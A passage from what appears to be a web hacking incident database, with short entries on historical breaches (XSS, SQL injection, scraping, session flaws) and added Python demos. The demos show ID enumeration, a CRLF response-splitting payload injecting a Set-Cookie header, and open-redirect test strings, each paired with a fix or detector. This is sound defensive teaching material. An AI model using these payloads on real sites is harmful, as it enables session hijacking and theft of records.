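    102: {"author": "dave", "audience": {"erin"}, "text": "confidential: new job"},
    103: {"author": "alice", "audience": {"bob"}, "text": "bob only"},
}


def get_bulletin_vulnerable(message_id: int):
    """Looks the record up by its id and nothing else: the weakness in both incidents."""
    return BULLETINS.get(message_id)


def harvest(start: int, stop: int) -> dict:
    """What an attacker does against the vulnerable lookup: walk the id space."""
    found = {}
    for i in range(start, stop):
        record = get_bulletin_vulnerable(i)
        if record is not None:
            found[i] = record["text"]
    return found


def _may_read(viewer: str, record: dict) -> bool:
    return viewer == record["author"] or viewer in record["audience"]


def get_bulletin(viewer: str, message_id: int):
    """Authorises on every access; 'not found' and 'not yours' look identical."""
    record = BULLETINS.get(message_id)
    if record is None or not _may_read(viewer, record):
        return None
    return record


class HandleStore:
    """Second layer: expose records by unguessable handles rather than sequence
    numbers. This does not replace the authorisation check; it removes the
    enumeration route."""

    def __init__(self):
        self._by_handle = {}

    def publish(self, record: dict) -> str:
        handle = secrets.token_urlsafe(16)  # 128 bits from the OS CSPRNG
        self._by_handle[handle] = record
        return handle

    def lookup(self, viewer: str, handle: str):
        record = self._by_handle.get(handle)
        if record is None or not _may_read(viewer, record):
            return None
        return record


if __name__ == "__main__":
    print("enumerated:", harvest(100, 110))
    print("erin reads 101:", get_bulletin("erin", 101))
    print("bob reads 101:", get_bulletin("bob", 101)["text"])
    store = HandleStore()
    h = store.publish(BULLETINS[102])
    print("handle:", h, "-> erin:", store.lookup("erin", h)["text"], "bob:", store.lookup("bob", h))
```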

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-1: Google's Blogger HRS vulnerability
WHID ID: 2006-1
Date Occured: 2/26/2006
Attack Method: HTTP Response Splitting
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:
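
The entry records an HTTP Response Splitting vulnerability in Google's Blogger but carries no description, so the block below is an added example of the technique in general, not code from Blogger or from WHID; it also serves WHID 2006-7 (the Google Reader redirection), since both bugs live in the same place, a redirect whose target comes from the request. A handler that pastes the parameter into the `Location` header turns one header into two when the parameter contains a CRLF pair; the same parameter, unvalidated, sends users off-site. The safe version rejects control characters and backslashes, then requires either a site-local absolute path or an https URL to an allowlisted host. `ALLOWED_REDIRECT_HOSTS` and the payloads are constructed for the demonstration.

```python
from urllib.parse import urlsplit

# Assumption for the example: the only external host users may be sent to.
ALLOWED_REDIRECT_HOSTS = {"www.example.org"}


def redirect_vulnerable(target: str) -> bytes:
    """Builds the response with the (already URL-decoded) parameter pasted in."""
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n\r\n".encode()


def header_names(raw: bytes) -> list:
    """Splits a raw response head the way a client or proxy would."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    return [line.split(b":", 1)[0].decode() for line in head.split(b"\r\n")[1:]]


def safe_redirect_target(target: str) -> str:
    """Returns the target if it may go into a Location header, else raises."""
    # Check for control characters BEFORE parsing: recent urlsplit() silently
    # strips CR, LF and TAB, which would hide the injection from later checks.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in target):
        raise ValueError("control character in redirect target (header injection)")
    if "\\" in target:
        raise ValueError("backslash in redirect target (browsers treat /\\ like //)")
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative URL: only https to an allowlisted host.
        if parts.scheme != "https" or parts.netloc not in ALLOWED_REDIRECT_HOSTS:
            raise ValueError("redirect to a non-allowlisted destination")
    elif not target.startswith("/") or target.startswith("//"):
        raise ValueError("relative target must be an absolute path on this site")
    return target


def redirect_safe(target: str) -> bytes:
    location = safe_redirect_target(target)
    return f"HTTP/1.1 302 Found\r\nLocation: {location}\r\n\r\n".encode()


def is_rejected(target: str) -> bool:
    try:
        safe_redirect_target(target)
        return False
    except ValueError:
        return True


# Constructed attack: a CRLF pair inside the parameter (sent as %0d%0a on the
# wire and decoded by the framework) grows one header into two.
SPLIT_PAYLOAD = "/home\r\nSet-Cookie: session=attacker-chosen"

if __name__ == "__main__":
    print("vulnerable headers:", header_names(redirect_vulnerable(SPLIT_PAYLOAD)))
    for t in (SPLIT_PAYLOAD, "//evil.example/login", "javascript:alert(1)",
              "/\\evil.example", "https://www.example.org/account", "/account?next=1"):
        print(f"{t!r}: {'rejected' if is_rejected(t) else 'allowed'}")
```

Modern web frameworks refuse to emit a header containing CR or LF, which closes the splitting half of this on its own; the open-redirect half still needs the destination check, and the check has to run on the decoded value the application actually uses.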

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-65: LexisNexis Data Breach
WHID ID: 2005-65
Date Occured: 2/17/2008
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Leakage of Information
Attacked Entity Field: Information Services
Attacked Entity Geography: USA
Incident Description:

The LexisNexis data breach is not new, but we have recently decided to start tracking abuse of insufficient anti-automation measures and are adding historical incidents.

In this incident a group of people opened accounts at the data broker LexisNexis and used automated tools to extract a large amount of the personal information provided by the service.

As usual in such cases there is a question of whether the attack was a criminal activity, a violation of the information provider's license agreement, or plainly legal. In this regard it is interesting to note that the group arrested in the incident was also responsible for the hacking of Paris Hilton's Vodafone account, which was clearly an unlawful act.

Back in 2005 this data breach was one of the first such incidents; it generated a lot of media interest and led to more regulation of information aggregators. Interestingly, the company's explanation was that there had been no security failure in the web site, only that its procedures were lacking. We accepted this story at the time, but today we believe that such automation and scraping attacks are among the most dangerous attacks.
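
The incident describes legitimate accounts driving automated lookups, which no input filter will ever catch; what distinguishes it from normal use is volume and pace per account. The block below is an added example of the detection side, not code from LexisNexis or WHID: a sliding-window counter over a constructed access log that flags any account pulling more distinct records in a window than a person reviewing results by hand plausibly would. The log format, field names, window length and threshold are all invented for the demonstration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

# Constructed access-log format for a record-lookup service.
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) account=(?P<account>\S+) action=lookup record=(?P<record>\S+)$"
)


def fmt(epoch: float) -> str:
    return datetime.fromtimestamp(epoch, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def parse_log(lines):
    """Yields (epoch_seconds, account, record_id) for lookup events, in file order."""
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00")).timestamp()
        yield ts, m["account"], m["record"]


def flag_scrapers(events, window_seconds=300, max_distinct_records=25):
    """Sliding window per account over distinct record ids. Returns
    {account: timestamp at which the threshold was first crossed}."""
    window = defaultdict(deque)  # account -> deque of (ts, record)
    flagged = {}
    for ts, account, record in events:
        q = window[account]
        q.append((ts, record))
        while q and ts - q[0][0] > window_seconds:
            q.popleft()
        distinct = len({r for _, r in q})
        if distinct > max_distinct_records and account not in flagged:
            flagged[account] = fmt(ts)
    return flagged


def build_sample_log():
    """Constructed log: one analyst doing a handful of lookups, one account
    pulling a new record every four seconds."""
    base = datetime(2005, 3, 9, 10, 0, tzinfo=timezone.utc).timestamp()
    lines = []
    for i in range(6):
        lines.append(f"{fmt(base + i * 45)} account=analyst01 action=lookup record=R{1000 + i}")
    for i in range(60):
        lines.append(f"{fmt(base + i * 4)} account=bulk77 action=lookup record=R{2000 + i}")
    lines.sort()  # fixed-width ISO timestamps sort chronologically
    return lines


if __name__ == "__main__":
    print(flag_scrapers(parse_log(build_sample_log())))
```

Counting distinct records rather than requests matters: refreshing the same result page is not scraping, while a steady stream of new identifiers is. In practice the threshold would be tuned per subscription tier and the flag fed to a step-up check (CAPTCHA, phone verification) rather than a hard block, since the account itself is real.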

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-64: Woman scammed QVC for $400,000+ in Internet glitch
WHID ID: 2005-64
Date Occured: 11/20/2007
Attack Method: Abuse of Functionality
Application Weakness: Insufficient Process Validation
Outcome: Monetary Loss
Attacked Entity Field:
Attacked Entity Geography: USA
Incident Description:

A woman exploited a bug in the QVC shopping network web site to obtain, without paying, more than 1800 items worth $412,000 from March to November 2005. The glitch enabled her to cancel orders she placed at a specific time and still receive the product.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-63: Web designer sentenced for hacking competitor's site
WHID ID: 2005-63
Date Occured: 8/14/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

While lacking in technical details, this story is certainly juicy. It demonstrates well the business use of web site hacking. The downside is that the hacker got only a minimal punishment, which, unless the incident itself is overrated in the media, is a very bad sign of how courts view computer crime.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-62: Guidance Software
WHID ID: 2005-62
Date Occured: 4/18/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

3,800 customer credit-card numbers were stolen in the attack on the Guidance Software web site. This incident is made more severe since Guidance Software is a provider of software for investigating security breaches and many of its clients are security and law enforcement agencies, some of them known to be affected.

As usual in such cases the actual way in which the information was stolen was not disclosed. A Federal Trade Commission report on the incident, published only in 2007, revealed that the incident was the result of an SQL injection attack on Guidance servers. In a settlement with the FTC, Guidance agreed to implement a comprehensive information security program, including independent, third-party audits every other year for the next ten years.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-61: Gmail session management bug
WHID ID: 2005-61
Date Occured: 4/12/2006
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A bug in Gmail's authentication and session management allows direct login to anybody's account without requiring any involvement of the victim.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-60: KU shuts down housing application Web site
WHID ID: 2005-60
Date Occured: 2/26/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

The web site used to file online for housing at KU was shut down for lack of proper security measures to prevent visitors from viewing personal information about others.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-59: Vote Someone Else's Shares
WHID ID: 2005-59
Date Occured: 2/28/2006
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Janus mutual fund uses a predictable identifier to authenticate its shareholders, enabling them to vote for others.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-58: Yahoo mail Cross Site Scripting
WHID ID: 2005-58
Date Occured: 2/28/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An attacker can send an e-mail with a malicious script to a victim, which performs its actions immediately when the e-mail is read.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-57: RPG site bit by hackers
WHID ID: 2005-57
Date Occured: 2/26/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Extortion
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

User data was stolen from an online game web site. The hacker tried to extort RPG by threatening to publish the users' data. The news item states that the hack was the result of a flaw in custom web site software.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-56: XSS vulnerabilities in Google.com
WHID ID: 2005-56
Date Occured: 2/28/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A redirection to an error page on Google.com includes values sent by the user. This vulnerability allows phishers to send an e-mail with links to Google that will include their attack page.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-55: Yahoo RSS XSS Vulnerability
WHID ID: 2005-55
Date Occured: 2/28/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A malicious site can offer users a malformed RSS XML file to be included in Yahoo RSS aggregation, which would enable stealing Yahoo cookies.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-54: XSS vulnerability in NIST web site
WHID ID: 2005-54
Date Occured: 2/26/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Netcraft discovered an XSS vulnerability in the NIST web site, which ironically hosts the U.S. National Vulnerability Database.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-53: Charity Web Site Hacked
WHID ID: 2005-53
Date Occured: 2/26/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Credit Card Leakage
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A UK Church charity web site was hacked and at least 3000 credit card numbers were stolen. The credit card information is known to have been used by the hackers. While no specific details are given, the article indicates how the site was hacked.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-51: Critical MySpace Vulnerabilities Leave Every Active Account Exploitable
WHID ID: 2005-51
Date Occured: 2/28/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An XSS vulnerability is triggered when receiving notification of an incoming IM message. Additionally, it is possible to send an IM message to somebody who has blocked such messages by pretending to be answering a message from him.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-50: XSS on Yahoo Mail
WHID ID: 2005-50
Date Occured: 2/28/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Inserting code in an HTML attachment enables changing the user interface of Yahoo Mail, which may enable fraud.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-49: Google Base launched with security hole
WHID ID: 2005-49
Date Occured: 2/28/2006
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

XSS in the Google Base search function.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-48: Insufficient authorization on Papa John's Pizza chain web site
WHID ID: 2005-48
Date Occured: 11/10/2005
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-47: SEC Vs. The Estonian Spiders
WHID ID: 2005-47
Date Occured: 11/8/2005
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Business Wire allowed access to unpublished press releases.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-46: Teen uses SQL injection to break to a security magazine web site
WHID ID: 2005-46
Date Occured: 2/26/2006
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A high school student used SQL injection to break into the site of a Taiwanese information security magazine from the TechTarget group and steal customers' information.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-44: Xoops web site hacked
WHID ID: 2005-44
Date Occured: 11/8/2005
Attack Method: Administration Error
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A configuration mistake left an unused virtual host unprotected. No details of the configuration problem are given.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-43: XSS in Yahoo's Web mail enables phishing
WHID ID: 2005-43
Date Occured: 11/10/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

XSS in Yahoo Mail allows phishing.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-42: Default password in a common application used by schools
WHID ID: 2005-42
Date Occured: 11/10/2005
Attack Method: Administration Error
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

The software has a default password for teachers, enabling anyone to access the system with teacher privileges.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-41: XSS on Google's AdWords enables phishing
WHID ID: 2005-41
Date Occured: 11/10/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-40: Defacement of several Novell websites
WHID ID: 2005-40
Date Occured: 11/8/2005
Attack Method: Administration Error
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Script upload due to a known Scoop vulnerability.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-39: Promotional Firefox community site hacked (again)
WHID ID: 2005-39
Date Occured: 11/8/2005
Attack Method: OS Commanding
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Exploited an unpatched TWiki installation.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-38: Massachusetts Teen Convicted for Hacking into Internet and Telephone Service Providers
WHID ID: 2005-38
Date Occured: 9/12/2005
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Extortion
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Teen convicted of threatening an ISP with a DoS attack, among other computer hacking activities.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-37: A 12-year-old hacked an online game and stole game items
WHID ID: 2005-37
Date Occured: 9/12/2005
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Information Warfare
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A 12-year-old guessed a woman's login information and abused her account, stealing game items from her.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-36: Predictable delay in an online poker game enabled users to beat the casino
WHID ID: 2005-36
Date Occured: 9/4/2005
Attack Method: Unintentional Information Disclosure
Application Weakness: Abuse of Functionality
Outcome: Monetary Loss
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A player of an online game discovered that a considerable delay hinted at the cards the dealer held.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-35: Stanford University web sites defaced using XMLRPC bug
WHID ID: 2005-35
Date Occured: 8/23/2005
Attack Method: OS Commanding
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Sites were defaced by exploiting an issue in an XMLRPC library used by PHP.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-34: Man logs into dabs.com misc customer account
WHID ID: 2005-34
Date Occured: 8/22/2005
Attack Method: Abuse of Functionality
Application Weakness: Insufficient Password Recovery
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-33: Insufficient authorization on Verizon's MyAccount feature
WHID ID: 2005-33
Date Occured: 8/22/2005
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A web site flaw could have allowed a user to view another subscriber's balance of remaining airtime minutes and the number of minutes that customer had used in the current billing cycle.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-32: Weak password recovery on Citrix's site
WHID ID: 2005-32
Date Occured: 8/8/2005
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Password Recovery
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Weak password recovery procedure at Citrix.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-31: Hacker forced new planet discovery out of the closet
WHID ID: 2005-31
Date Occured: 8/4/2005
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Extortion
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-30: Blogger Developers Network Blog Cracked
WHID ID: 2005-30
Date Occured: 8/4/2005
Attack Method: Administration Error
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

The official answer from Blogger was that this was not the result of a hack attempt but of a subtle bug that occurred because "our Developer's Network blog is a special case [it's got two names, 'code.blogger.com' and 'code.blogspot.com']."

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-29: Security issues in interactive hotel TVs
WHID ID: 2005-29
Date Occured: 7/31/2005
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authentication
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

While not strictly web security, this discussion of hotel room TV application security is a very good example of the dangers of our networked society.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-28: Phishers Steal Trust from eBay Sign In Pages
WHID ID: 2005-28
Date Occured:
Attack Method: Redirection
Application Weakness: Improper Input Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-27: Phishers hack eBay
WHID ID: 2005-27
Date Occured: 8/8/2005
Attack Method: Redirection
Application Weakness: Improper Input Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A bug in an eBay site allowed phishers to redirect users to their own servers after filling in details at the genuine eBay site.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-26: NISCC reveals SAP R/3 security flaw
WHID ID: 2005-26
Date Occured: 7/31/2005
Attack Method: Path Traversal
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-25: No Charges Filed Yet Against South Charlotte Computer Hacker
WHID ID: 2005-25
Date Occured: 7/31/2005
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A man hacked into a competing web site.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-24: Firefox marketing site hacked
WHID ID: 2005-24
Date Occured: 7/15/2005
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-23: Chinese hacker held in Web data theft
WHID ID: 2005-23
Date Occured: 7/11/2005
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

The hacker who penetrated Kakaku.com was arrested after breaking into Club Tourism International Inc. The hacking was done in order to earn money to pay for tuition.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-22: MS UK defaced in hacking attack
WHID ID: 2005-22
Date Occured: 7/11/2005
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Microsoft UK site defaced due to server misconfiguration.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-21: Insufficient authentication on USC admissions site allowed access to applicants data
WHID ID: 2005-21
Date Occured:
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A person who discovered an SQL injection vulnerability in a USC system and informed SecurityFocus about the flaw was criminally charged with breaking into the system.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-20: Security gaps found in EPA contracting system
WHID ID: 2005-20
Date Occured: 2/26/2006
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Disclosure Only
Attacked Entity Field:
